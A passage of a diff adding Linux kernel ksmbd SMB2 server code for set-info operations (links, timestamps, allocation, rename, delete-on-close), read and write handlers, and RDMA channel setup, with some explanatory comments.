++	if (!IS_ERR(new_name))
++		kfree(new_name);
++	return rc;
++}
++
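++/*
++ * Handle FILE_LINK_INFORMATION: create a hard link to the open file,
++ * honoring ReplaceIfExists. Hard links to directories are rejected.
++ */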
++static int smb2_create_link(struct ksmbd_work *work,
++			    struct ksmbd_share_config *share,
++			    struct smb2_file_link_info *file_info,
++			    unsigned int buf_len, struct file *filp,
++			    struct nls_table *local_nls)
++{
++	char *link_name = NULL, *target_name = NULL, *pathname = NULL;
++	struct path path;
++	bool file_present = true;
++	int rc;
++
++	if (buf_len < (u64)sizeof(struct smb2_file_link_info) +
++			le32_to_cpu(file_info->FileNameLength))
++		return -EINVAL;
++
++	ksmbd_debug(SMB, "setting FILE_LINK_INFORMATION\n");
++	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
++	if (!pathname)
++		return -ENOMEM;
++
++	link_name = smb2_get_name(file_info->FileName,
++				  le32_to_cpu(file_info->FileNameLength),
++				  local_nls);
++	if (IS_ERR(link_name) || S_ISDIR(file_inode(filp)->i_mode)) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "link name is %s\n", link_name);
++	target_name = file_path(filp, pathname, PATH_MAX);
++	if (IS_ERR(target_name)) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "target name is %s\n", target_name);
++	rc = ksmbd_vfs_kern_path(work, link_name, LOOKUP_NO_SYMLINKS, &path, 0);
++	if (rc) {
++		if (rc != -ENOENT)
++			goto out;
++		file_present = false;
++	} else {
++		path_put(&path);
++	}
++
++	if (file_info->ReplaceIfExists) {
++		if (file_present) {
++			rc = ksmbd_vfs_remove_file(work, link_name);
++			if (rc) {
++				rc = -EINVAL;
++				ksmbd_debug(SMB, "cannot delete %s\n",
++					    link_name);
++				goto out;
++			}
++		}
++	} else {
++		if (file_present) {
++			rc = -EEXIST;
++			ksmbd_debug(SMB, "link already exists\n");
++			goto out;
++		}
++	}
++
++	rc = ksmbd_vfs_link(work, target_name, link_name);
++	if (rc)
++		rc = -EINVAL;
++out:
++	if (!IS_ERR(link_name))
++		kfree(link_name);
++	kfree(pathname);
++	return rc;
++}
++
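++/*
++ * Apply FILE_BASIC_INFORMATION: update timestamps and DOS attributes,
++ * persisting them in the DOS attribute xattr when the share stores
++ * DOS attributes.
++ */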
++static int set_file_basic_info(struct ksmbd_file *fp,
++			       struct smb2_file_basic_info *file_info,
++			       struct ksmbd_share_config *share)
++{
++	struct iattr attrs;
++	struct file *filp;
++	struct inode *inode;
++	struct user_namespace *user_ns;
++	int rc = 0;
++
++	if (!(fp->daccess & FILE_WRITE_ATTRIBUTES_LE))
++		return -EACCES;
++
++	attrs.ia_valid = 0;
++	filp = fp->filp;
++	inode = file_inode(filp);
++	user_ns = file_mnt_user_ns(filp);
++
++	if (file_info->CreationTime)
++		fp->create_time = le64_to_cpu(file_info->CreationTime);
++
++	if (file_info->LastAccessTime) {
++		attrs.ia_atime = ksmbd_NTtimeToUnix(file_info->LastAccessTime);
++		attrs.ia_valid |= (ATTR_ATIME | ATTR_ATIME_SET);
++	}
++
++	attrs.ia_valid |= ATTR_CTIME;
++	if (file_info->ChangeTime)
++		attrs.ia_ctime = ksmbd_NTtimeToUnix(file_info->ChangeTime);
++	else
++		attrs.ia_ctime = inode->i_ctime;
++
++	if (file_info->LastWriteTime) {
++		attrs.ia_mtime = ksmbd_NTtimeToUnix(file_info->LastWriteTime);
++		attrs.ia_valid |= (ATTR_MTIME | ATTR_MTIME_SET);
++	}
++
++	if (file_info->Attributes) {
++		if (!S_ISDIR(inode->i_mode) &&
++		    file_info->Attributes & FILE_ATTRIBUTE_DIRECTORY_LE) {
++			pr_err("can't change a file to a directory\n");
++			return -EINVAL;
++		}
++
++		if (!(S_ISDIR(inode->i_mode) && file_info->Attributes == FILE_ATTRIBUTE_NORMAL_LE))
++			fp->f_ci->m_fattr = file_info->Attributes |
++				(fp->f_ci->m_fattr & FILE_ATTRIBUTE_DIRECTORY_LE);
++	}
++
++	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_STORE_DOS_ATTRS) &&
++	    (file_info->CreationTime || file_info->Attributes)) {
++		struct xattr_dos_attrib da = {0};
++
++		da.version = 4;
++		da.itime = fp->itime;
++		da.create_time = fp->create_time;
++		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
++		da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
++			XATTR_DOSINFO_ITIME;
++
++		rc = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
++						    filp->f_path.dentry, &da);
++		if (rc)
++			ksmbd_debug(SMB,
++				    "failed to restore file attribute in EA\n");
++		rc = 0;
++	}
++
++	if (attrs.ia_valid) {
++		struct dentry *dentry = filp->f_path.dentry;
++		struct inode *inode = d_inode(dentry);
++
++		if (IS_IMMUTABLE(inode) || IS_APPEND(inode))
++			return -EACCES;
++
++		inode_lock(inode);
++		inode->i_ctime = attrs.ia_ctime;
++		attrs.ia_valid &= ~ATTR_CTIME;
++		rc = notify_change(user_ns, dentry, &attrs, NULL);
++		inode_unlock(inode);
++	}
++	return rc;
++}
++
++static int set_file_allocation_info(struct ksmbd_work *work,
++				    struct ksmbd_file *fp,
++				    struct smb2_file_alloc_info *file_alloc_info)
++{
++	/*
++	 * TODO: this currently works only when the "store dos attributes"
++	 * option is disabled; logic that behaves correctly with any
++	 * smb.conf setting still needs to be implemented.
++	 */
++
++	loff_t alloc_blks;
++	struct inode *inode;
++	int rc;
++
++	if (!(fp->daccess & FILE_WRITE_DATA_LE))
++		return -EACCES;
++
++	alloc_blks = (le64_to_cpu(file_alloc_info->AllocationSize) + 511) >> 9;
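++	/*
++	 * Worked example (illustrative only): AllocationSize = 1000
++	 * rounds up to alloc_blks = (1000 + 511) >> 9 = 2, i.e. two
++	 * 512-byte blocks, matching the 512-byte units of i_blocks
++	 * compared against below.
++	 */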
++	inode = file_inode(fp->filp);
++
++	if (alloc_blks > inode->i_blocks) {
++		smb_break_all_levII_oplock(work, fp, 1);
++		rc = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
++				   alloc_blks * 512);
++		if (rc && rc != -EOPNOTSUPP) {
++			pr_err("vfs_fallocate is failed : %d\n", rc);
++			return rc;
++		}
++	} else if (alloc_blks < inode->i_blocks) {
++		loff_t size;
++
++		/*
++		 * The requested allocation size may be smaller than the
++		 * current one, which means allocated blocks in the file
++		 * should be deallocated. Truncate is used to cut them off,
++		 * but since truncate also updates the inode size, the
++		 * original size is saved beforehand and written back.
++		 */
++		size = i_size_read(inode);
++		rc = ksmbd_vfs_truncate(work, fp, alloc_blks * 512);
++		if (rc) {
++			pr_err("truncate failed!, err %d\n", rc);
++			return rc;
++		}
++		if (size < alloc_blks * 512)
++			i_size_write(inode, size);
++	}
++	return 0;
++}
++
++static int set_end_of_file_info(struct ksmbd_work *work, struct ksmbd_file *fp,
++				struct smb2_file_eof_info *file_eof_info)
++{
++	loff_t newsize;
++	struct inode *inode;
++	int rc;
++
++	if (!(fp->daccess & FILE_WRITE_DATA_LE))
++		return -EACCES;
++
++	newsize = le64_to_cpu(file_eof_info->EndOfFile);
++	inode = file_inode(fp->filp);
++
++	/*
++	 * If FILE_END_OF_FILE_INFORMATION is set on a FAT32 shared
++	 * device, truncation can take so long that the Windows client
++	 * hits a network error, because filesystems like FAT32 fill
++	 * the truncated range with zero data.
++	 */
++	if (inode->i_sb->s_magic != MSDOS_SUPER_MAGIC) {
++		ksmbd_debug(SMB, "truncated to newsize %lld\n", newsize);
++		rc = ksmbd_vfs_truncate(work, fp, newsize);
++		if (rc) {
++			ksmbd_debug(SMB, "truncate failed!, err %d\n", rc);
++			if (rc != -EAGAIN)
++				rc = -EBADF;
++			return rc;
++		}
++	}
++	return 0;
++}
++
++static int set_rename_info(struct ksmbd_work *work, struct ksmbd_file *fp,
++			   struct smb2_file_rename_info *rename_info,
++			   unsigned int buf_len)
++{
++	struct user_namespace *user_ns;
++	struct ksmbd_file *parent_fp;
++	struct dentry *parent;
++	struct dentry *dentry = fp->filp->f_path.dentry;
++	int ret;
++
++	if (!(fp->daccess & FILE_DELETE_LE)) {
++		pr_err("no right to delete : 0x%x\n", fp->daccess);
++		return -EACCES;
++	}
++
++	if (buf_len < (u64)sizeof(struct smb2_file_rename_info) +
++			le32_to_cpu(rename_info->FileNameLength))
++		return -EINVAL;
++
++	user_ns = file_mnt_user_ns(fp->filp);
++	if (ksmbd_stream_fd(fp))
++		goto next;
++
++	parent = dget_parent(dentry);
++	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
++	if (ret) {
++		dput(parent);
++		return ret;
++	}
++
++	parent_fp = ksmbd_lookup_fd_inode(d_inode(parent));
++	inode_unlock(d_inode(parent));
++	dput(parent);
++
++	if (parent_fp) {
++		if (parent_fp->daccess & FILE_DELETE_LE) {
++			pr_err("parent dir is opened with delete access\n");
++			ksmbd_fd_put(work, parent_fp);
++			return -ESHARE;
++		}
++		ksmbd_fd_put(work, parent_fp);
++	}
++next:
++	return smb2_rename(work, fp, user_ns, rename_info,
++			   work->conn->local_nls);
++}
++
++static int set_file_disposition_info(struct ksmbd_file *fp,
++				     struct smb2_file_disposition_info *file_info)
++{
++	struct inode *inode;
++
++	if (!(fp->daccess & FILE_DELETE_LE)) {
++		pr_err("no right to delete : 0x%x\n", fp->daccess);
++		return -EACCES;
++	}
++
++	inode = file_inode(fp->filp);
++	if (file_info->DeletePending) {
++		if (S_ISDIR(inode->i_mode) &&
++		    ksmbd_vfs_empty_dir(fp) == -ENOTEMPTY)
++			return -EBUSY;
++		ksmbd_set_inode_pending_delete(fp);
++	} else {
++		ksmbd_clear_inode_pending_delete(fp);
++	}
++	return 0;
++}
++
++static int set_file_position_info(struct ksmbd_file *fp,
++				  struct smb2_file_pos_info *file_info)
++{
++	loff_t current_byte_offset;
++	unsigned long sector_size;
++	struct inode *inode;
++
++	inode = file_inode(fp->filp);
++	current_byte_offset = le64_to_cpu(file_info->CurrentByteOffset);
++	sector_size = inode->i_sb->s_blocksize;
++
++	if (current_byte_offset < 0 ||
++	    (fp->coption == FILE_NO_INTERMEDIATE_BUFFERING_LE &&
++	     current_byte_offset & (sector_size - 1))) {
++		pr_err("CurrentByteOffset is not valid : %llu\n",
++		       current_byte_offset);
++		return -EINVAL;
++	}
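++	/*
++	 * Example of the alignment rule above (illustrative): with a
++	 * 512-byte sector size and FILE_NO_INTERMEDIATE_BUFFERING set,
++	 * an offset of 1024 passes (1024 & 511 == 0) while 1000 is
++	 * rejected (1000 & 511 == 488).
++	 */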
++
++	fp->filp->f_pos = current_byte_offset;
++	return 0;
++}
++
++static int set_file_mode_info(struct ksmbd_file *fp,
++			      struct smb2_file_mode_info *file_info)
++{
++	__le32 mode;
++
++	mode = file_info->Mode;
++
++	if ((mode & ~FILE_MODE_INFO_MASK)) {
++		pr_err("Mode is not valid : 0x%x\n", le32_to_cpu(mode));
++		return -EINVAL;
++	}
++
++	/*
++	 * TODO: handling for FILE_SYNCHRONOUS_IO_ALERT and
++	 * FILE_SYNCHRONOUS_IO_NONALERT still needs to be implemented
++	 */
++	ksmbd_vfs_set_fadvise(fp->filp, mode);
++	fp->coption = mode;
++	return 0;
++}
++
++/**
++ * smb2_set_info_file() - handler for smb2 set info command
++ * @work:	smb work containing set info command buffer
++ * @fp:		ksmbd_file pointer
++ * @req:	request buffer pointer
++ * @share:	ksmbd_share_config pointer
++ *
++ * Return:	0 on success, otherwise error
++ * TODO: error handling for STATUS_INFO_LENGTH_MISMATCH still needs to be implemented
++ */
++static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
++			      struct smb2_set_info_req *req,
++			      struct ksmbd_share_config *share)
++{
++	unsigned int buf_len = le32_to_cpu(req->BufferLength);
++
++	switch (req->FileInfoClass) {
++	case FILE_BASIC_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_basic_info))
++			return -EINVAL;
++
++		return set_file_basic_info(fp, (struct smb2_file_basic_info *)req->Buffer, share);
++	}
++	case FILE_ALLOCATION_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_alloc_info))
++			return -EINVAL;
++
++		return set_file_allocation_info(work, fp,
++						(struct smb2_file_alloc_info *)req->Buffer);
++	}
++	case FILE_END_OF_FILE_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_eof_info))
++			return -EINVAL;
++
++		return set_end_of_file_info(work, fp,
++					    (struct smb2_file_eof_info *)req->Buffer);
++	}
++	case FILE_RENAME_INFORMATION:
++	{
++		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			return -EACCES;
++		}
++
++		if (buf_len < sizeof(struct smb2_file_rename_info))
++			return -EINVAL;
++
++		return set_rename_info(work, fp,
++				       (struct smb2_file_rename_info *)req->Buffer,
++				       buf_len);
++	}
++	case FILE_LINK_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_link_info))
++			return -EINVAL;
++
++		return smb2_create_link(work, work->tcon->share_conf,
++					(struct smb2_file_link_info *)req->Buffer,
++					buf_len, fp->filp,
++					work->conn->local_nls);
++	}
++	case FILE_DISPOSITION_INFORMATION:
++	{
++		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			return -EACCES;
++		}
++
++		if (buf_len < sizeof(struct smb2_file_disposition_info))
++			return -EINVAL;
++
++		return set_file_disposition_info(fp,
++						 (struct smb2_file_disposition_info *)req->Buffer);
++	}
++	case FILE_FULL_EA_INFORMATION:
++	{
++		if (!(fp->daccess & FILE_WRITE_EA_LE)) {
++			pr_err("Not permitted to write ext  attr: 0x%x\n",
++			       fp->daccess);
++			return -EACCES;
++		}
++
++		if (buf_len < sizeof(struct smb2_ea_info))
++			return -EINVAL;
++
++		return smb2_set_ea((struct smb2_ea_info *)req->Buffer,
++				   buf_len, &fp->filp->f_path);
++	}
++	case FILE_POSITION_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_pos_info))
++			return -EINVAL;
++
++		return set_file_position_info(fp, (struct smb2_file_pos_info *)req->Buffer);
++	}
++	case FILE_MODE_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_mode_info))
++			return -EINVAL;
++
++		return set_file_mode_info(fp, (struct smb2_file_mode_info *)req->Buffer);
++	}
++	}
++
++	pr_err("Unimplemented Fileinfoclass :%d\n", req->FileInfoClass);
++	return -EOPNOTSUPP;
++}
++
++static int smb2_set_info_sec(struct ksmbd_file *fp, int addition_info,
++			     char *buffer, int buf_len)
++{
++	struct smb_ntsd *pntsd = (struct smb_ntsd *)buffer;
++
++	fp->saccess |= FILE_SHARE_DELETE_LE;
++
++	return set_info_sec(fp->conn, fp->tcon, &fp->filp->f_path, pntsd,
++			buf_len, false);
++}
++
++/**
++ * smb2_set_info() - handler for smb2 set info command
++ * @work:	smb work containing set info request buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_set_info(struct ksmbd_work *work)
++{
++	struct smb2_set_info_req *req;
++	struct smb2_set_info_rsp *rsp;
++	struct ksmbd_file *fp;
++	int rc = 0;
++	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
++
++	ksmbd_debug(SMB, "Received set info request\n");
++
++	if (work->next_smb2_rcv_hdr_off) {
++		req = ksmbd_req_buf_next(work);
++		rsp = ksmbd_resp_buf_next(work);
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++				    work->compound_fid);
++			id = work->compound_fid;
++			pid = work->compound_pfid;
++		}
++	} else {
++		req = smb2_get_msg(work->request_buf);
++		rsp = smb2_get_msg(work->response_buf);
++	}
++
++	if (!has_file_id(id)) {
++		id = req->VolatileFileId;
++		pid = req->PersistentFileId;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, id, pid);
++	if (!fp) {
++		ksmbd_debug(SMB, "Invalid id for close: %u\n", id);
++		rc = -ENOENT;
++		goto err_out;
++	}
++
++	switch (req->InfoType) {
++	case SMB2_O_INFO_FILE:
++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
++		rc = smb2_set_info_file(work, fp, req, work->tcon->share_conf);
++		break;
++	case SMB2_O_INFO_SECURITY:
++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_SECURITY\n");
++		if (ksmbd_override_fsids(work)) {
++			rc = -ENOMEM;
++			goto err_out;
++		}
++		rc = smb2_set_info_sec(fp,
++				       le32_to_cpu(req->AdditionalInformation),
++				       req->Buffer,
++				       le32_to_cpu(req->BufferLength));
++		ksmbd_revert_fsids(work);
++		break;
++	default:
++		rc = -EOPNOTSUPP;
++	}
++
++	if (rc < 0)
++		goto err_out;
++
++	rsp->StructureSize = cpu_to_le16(2);
++	inc_rfc1001_len(work->response_buf, 2);
++	ksmbd_fd_put(work, fp);
++	return 0;
++
++err_out:
++	if (rc == -EACCES || rc == -EPERM || rc == -EXDEV)
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	else if (rc == -EINVAL)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	else if (rc == -ESHARE)
++		rsp->hdr.Status = STATUS_SHARING_VIOLATION;
++	else if (rc == -ENOENT)
++		rsp->hdr.Status = STATUS_OBJECT_NAME_INVALID;
++	else if (rc == -EBUSY || rc == -ENOTEMPTY)
++		rsp->hdr.Status = STATUS_DIRECTORY_NOT_EMPTY;
++	else if (rc == -EAGAIN)
++		rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
++	else if (rc == -EBADF || rc == -ESTALE)
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++	else if (rc == -EEXIST)
++		rsp->hdr.Status = STATUS_OBJECT_NAME_COLLISION;
++	else if (rsp->hdr.Status == 0 || rc == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
++	smb2_set_err_rsp(work);
++	ksmbd_fd_put(work, fp);
++	ksmbd_debug(SMB, "error while processing smb2 query rc = %d\n", rc);
++	return rc;
++}
++
++/**
++ * smb2_read_pipe() - handler for smb2 read from IPC pipe
++ * @work:	smb work containing read IPC pipe command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++static noinline int smb2_read_pipe(struct ksmbd_work *work)
++{
++	int nbytes = 0, err;
++	u64 id;
++	struct ksmbd_rpc_command *rpc_resp;
++	struct smb2_read_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_read_rsp *rsp = smb2_get_msg(work->response_buf);
++
++	id = req->VolatileFileId;
++
++	inc_rfc1001_len(work->response_buf, 16);
++	rpc_resp = ksmbd_rpc_read(work->sess, id);
++	if (rpc_resp) {
++		if (rpc_resp->flags != KSMBD_RPC_OK) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		work->aux_payload_buf =
++			kvmalloc(rpc_resp->payload_sz, GFP_KERNEL | __GFP_ZERO);
++		if (!work->aux_payload_buf) {
++			err = -ENOMEM;
++			goto out;
++		}
++
++		memcpy(work->aux_payload_buf, rpc_resp->payload,
++		       rpc_resp->payload_sz);
++
++		nbytes = rpc_resp->payload_sz;
++		work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
++		work->aux_payload_sz = nbytes;
++		kvfree(rpc_resp);
++	}
++
++	rsp->StructureSize = cpu_to_le16(17);
++	rsp->DataOffset = 80;
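++	/*
++	 * Note (illustrative): DataOffset is fixed at 80 because the
++	 * payload follows the 64-byte SMB2 header plus the 16 fixed
++	 * bytes of the read response; StructureSize 17 counts those
++	 * 16 bytes plus one byte of variable data.
++	 */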
++	rsp->Reserved = 0;
++	rsp->DataLength = cpu_to_le32(nbytes);
++	rsp->DataRemaining = 0;
++	rsp->Flags = 0;
++	inc_rfc1001_len(work->response_buf, nbytes);
++	return 0;
++
++out:
++	rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++	smb2_set_err_rsp(work);
++	kvfree(rpc_resp);
++	return err;
++}
++
++static int smb2_set_remote_key_for_rdma(struct ksmbd_work *work,
++					struct smb2_buffer_desc_v1 *desc,
++					__le32 Channel,
++					__le16 ChannelInfoLength)
++{
++	unsigned int i, ch_count;
++
++	if (work->conn->dialect == SMB30_PROT_ID &&
++	    Channel != SMB2_CHANNEL_RDMA_V1)
++		return -EINVAL;
++
++	ch_count = le16_to_cpu(ChannelInfoLength) / sizeof(*desc);
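++	/*
++	 * Illustrative sizing: each smb2_buffer_desc_v1 is a 16-byte
++	 * descriptor (64-bit offset, 32-bit token, 32-bit length), so
++	 * a ChannelInfoLength of 32 yields ch_count = 2.
++	 */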
++	if (ksmbd_debug_types & KSMBD_DEBUG_RDMA) {
++		for (i = 0; i < ch_count; i++) {
++			pr_info("RDMA r/w request %#x: token %#x, length %#x\n",
++				i,
++				le32_to_cpu(desc[i].token),
++				le32_to_cpu(desc[i].length));
++		}
++	}
++	if (!ch_count)
++		return -EINVAL;
++
++	work->need_invalidate_rkey =
++		(Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE);
++	if (Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE)
++		work->remote_key = le32_to_cpu(desc->token);
++	return 0;
++}
++
++static ssize_t smb2_read_rdma_channel(struct ksmbd_work *work,
++				      struct smb2_read_req *req, void *data_buf,
++				      size_t length)
++{
++	int err;
++
++	err = ksmbd_conn_rdma_write(work->conn, data_buf, length,
++				    (struct smb2_buffer_desc_v1 *)
++				    ((char *)req + le16_to_cpu(req->ReadChannelInfoOffset)),
++				    le16_to_cpu(req->ReadChannelInfoLength));
++	if (err)
++		return err;
++
++	return length;
++}
++
++/**
++ * smb2_read() - handler for smb2 read from file
++ * @work:	smb work containing read command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_read(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_read_req *req;
++	struct smb2_read_rsp *rsp;
++	struct ksmbd_file *fp = NULL;
++	loff_t offset;
++	size_t length, mincount;
++	ssize_t nbytes = 0, remain_bytes = 0;
++	int err = 0;
++	bool is_rdma_channel = false;
++	unsigned int max_read_size = conn->vals->max_read_size;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC pipe read request\n");
++		return smb2_read_pipe(work);
++	}
++
++	if (req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE ||
++	    req->Channel == SMB2_CHANNEL_RDMA_V1) {
++		is_rdma_channel = true;
++		max_read_size = get_smbd_max_read_write_size();
++	}
++
++	if (is_rdma_channel) {
++		unsigned int ch_offset = le16_to_cpu(req->ReadChannelInfoOffset);
++
++		if (ch_offset < offsetof(struct smb2_read_req, Buffer)) {
++			err = -EINVAL;
++			goto out;
++		}
++		err = smb2_set_remote_key_for_rdma(work,
++						   (struct smb2_buffer_desc_v1 *)
++						   ((char *)req + ch_offset),
++						   req->Channel,
++						   req->ReadChannelInfoLength);
++		if (err)
++			goto out;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!fp) {
++		err = -ENOENT;
++		goto out;
++	}
++
++	if (!(fp->daccess & (FILE_READ_DATA_LE | FILE_READ_ATTRIBUTES_LE))) {
++		pr_err("Not permitted to read : 0x%x\n", fp->daccess);
++		err = -EACCES;
++		goto out;
++	}
++
++	offset = le64_to_cpu(req->Offset);
++	length = le32_to_cpu(req->Length);
++	mincount = le32_to_cpu(req->MinimumCount);
++
++	if (length > max_read_size) {
++		ksmbd_debug(SMB, "limiting read size to max size(%u)\n",
++			    max_read_size);
++		err = -EINVAL;
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
++		    fp->filp, offset, length);
++
++	work->aux_payload_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
++	if (!work->aux_payload_buf) {
++		err = -ENOMEM;
++		goto out;
++	}
++
++	nbytes = ksmbd_vfs_read(work, fp, length, &offset);
++	if (nbytes < 0) {
++		err = nbytes;
++		goto out;
++	}
++
++	if ((nbytes == 0 && length != 0) || nbytes < mincount) {
++		kvfree(work->aux_payload_buf);
++		work->aux_payload_buf = NULL;
++		rsp->hdr.Status = STATUS_END_OF_FILE;
++		smb2_set_err_rsp(work);
++		ksmbd_fd_put(work, fp);
++		return 0;
++	}
++
++	ksmbd_debug(SMB, "nbytes %zu, offset %lld mincount %zu\n",
++		    nbytes, offset, mincount);
++
++	if (is_rdma_channel) {
++		/* write data to the client using rdma channel */
++		remain_bytes = smb2_read_rdma_channel(work, req,
++						      work->aux_payload_buf,
++						      nbytes);
++		kvfree(work->aux_payload_buf);
++		work->aux_payload_buf = NULL;
++
++		nbytes = 0;
++		if (remain_bytes < 0) {
++			err = (int)remain_bytes;
++			goto out;
++		}
++	}
++
++	rsp->StructureSize = cpu_to_le16(17);
++	rsp->DataOffset = 80;
++	rsp->Reserved = 0;
++	rsp->DataLength = cpu_to_le32(nbytes);
++	rsp->DataRemaining = cpu_to_le32(remain_bytes);
++	rsp->Flags = 0;
++	inc_rfc1001_len(work->response_buf, 16);
++	work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
++	work->aux_payload_sz = nbytes;
++	inc_rfc1001_len(work->response_buf, nbytes);
++	ksmbd_fd_put(work, fp);
++	return 0;
++
++out:
++	if (err) {
++		if (err == -EISDIR)
++			rsp->hdr.Status = STATUS_INVALID_DEVICE_REQUEST;
++		else if (err == -EAGAIN)
++			rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
++		else if (err == -ENOENT)
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++		else if (err == -EACCES)
++			rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		else if (err == -ESHARE)
++			rsp->hdr.Status = STATUS_SHARING_VIOLATION;
++		else if (err == -EINVAL)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		else
++			rsp->hdr.Status = STATUS_INVALID_HANDLE;
++
++		smb2_set_err_rsp(work);
++	}
++	ksmbd_fd_put(work, fp);
++	return err;
++}
++
++/**
++ * smb2_write_pipe() - handler for smb2 write on IPC pipe
++ * @work:	smb work containing write IPC pipe command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++static noinline int smb2_write_pipe(struct ksmbd_work *work)
++{
++	struct smb2_write_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_write_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_rpc_command *rpc_resp;
++	u64 id = 0;
++	int err = 0, ret = 0;
++	char *data_buf;
++	size_t length;
++
++	length = le32_to_cpu(req->Length);
++	id = req->VolatileFileId;
++
++	if ((u64)le16_to_cpu(req->DataOffset) + length >
++	    get_rfc1002_len(work->request_buf)) {
++		pr_err("invalid write data offset %u, smb_len %u\n",
++		       le16_to_cpu(req->DataOffset),
++		       get_rfc1002_len(work->request_buf));
++		err = -EINVAL;
++		goto out;
++	}
++
++	data_buf = (char *)(((char *)&req->hdr.ProtocolId) +
++			   le16_to_cpu(req->DataOffset));
++
++	rpc_resp = ksmbd_rpc_write(work->sess, id, data_buf, length);
++	if (rpc_resp) {
++		if (rpc_resp->flags == KSMBD_RPC_ENOTIMPLEMENTED) {
++			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++			kvfree(rpc_resp);
++			smb2_set_err_rsp(work);
++			return -EOPNOTSUPP;
++		}
++		if (rpc_resp->flags != KSMBD_RPC_OK) {
++			rsp->hdr.Status = STATUS_INVALID_HANDLE;
++			smb2_set_err_rsp(work);
++			kvfree(rpc_resp);
++			return ret;
++		}
++		kvfree(rpc_resp);
++	}
++
++	rsp->StructureSize = cpu_to_le16(17);
++	rsp->DataOffset = 0;
++	rsp->Reserved = 0;
++	rsp->DataLength = cpu_to_le32(length);
++	rsp->DataRemaining = 0;
++	rsp->Reserved2 = 0;
++	inc_rfc1001_len(work->response_buf, 16);
++	return 0;
++out:
++	if (err) {
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++		smb2_set_err_rsp(work);
++	}
++
++	return err;
++}
++
++static ssize_t smb2_write_rdma_channel(struct ksmbd_work *work,
++				       struct smb2_write_req *req,
++				       struct ksmbd_file *fp,
++				       loff_t offset, size_t length, bool sync)
++{
++	char *data_buf;
++	int ret;
++	ssize_t nbytes;
++
++	data_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
++	if (!data_buf)
++		return -ENOMEM;
++
++	ret = ksmbd_conn_rdma_read(work->conn, data_buf, length,
++				   (struct smb2_buffer_desc_v1 *)
++				   ((char *)req + le16_to_cpu(req->WriteChannelInfoOffset)),
++				   le16_to_cpu(req->WriteChannelInfoLength));
++	if (ret < 0) {
++		kvfree(data_buf);
++		return ret;
++	}
++
++	ret = ksmbd_vfs_write(work, fp, data_buf, length, &offset, sync, &nbytes);
++	kvfree(data_buf);
++	if (ret < 0)
++		return ret;
++
++	return nbytes;
++}
++
++/**
++ * smb2_write() - handler for smb2 write to file
++ * @work:	smb work containing write command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_write(struct ksmbd_work *work)
++{
++	struct smb2_write_req *req;
++	struct smb2_write_rsp *rsp;
++	struct ksmbd_file *fp = NULL;
++	loff_t offset;
++	size_t length;
++	ssize_t nbytes;
++	char *data_buf;
++	bool writethrough = false, is_rdma_channel = false;
++	int err = 0;
++	unsigned int max_write_size = work->conn->vals->max_write_size;
++
++	WORK_BUFFERS(work, req, rsp);
++
